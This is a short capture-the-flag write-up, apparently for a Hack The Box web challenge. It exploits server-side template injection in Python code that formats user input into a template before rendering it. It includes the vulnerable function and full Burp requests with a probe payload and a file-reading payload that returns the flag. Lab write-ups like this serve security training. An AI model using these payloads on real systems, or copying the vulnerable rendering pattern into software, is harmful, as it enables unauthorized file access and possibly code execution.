some ssti injection

access: 64.227.41.40:32120
take attention pyton code:

def generate_render(converted_fonts):
	result = '''
		<tr>
			<td>{0}</td>
        </tr>
        
		<tr>
        	<td>{1}</td>
        </tr>
        
		<tr>
        	<td>{2}</td>
        </tr>
        
		<tr>
        	<td>{3}</td>
        </tr>

	'''.format(*converted_fonts)
	
	return Template(result).render()

change burp request to this:
GET /?text=%24%7b7*7%7d HTTP/1.1
Host: 64.227.41.40:32120
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://64.227.41.40:32120/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

payload: ${7*7}
response:
<tr>
    <td>49</td>
</tr>

change request to this:
GET /?text=%24%7bopen('%2fflag.txt').read()%7d HTTP/1.1
Host: 64.227.41.40:32120
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://64.227.41.40:32120/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

payload request: ${open('/flag.txt').read()}
response:
<tr>
    <td>HTB{t3mpl4t3_1nj3ct10n_C4n_3x1st5_4nywh343!!}</td>
</tr>

resource:
https://mukarramkhalid.com/hack-the-box-hack-the-boo-writeups/#web---spookifier
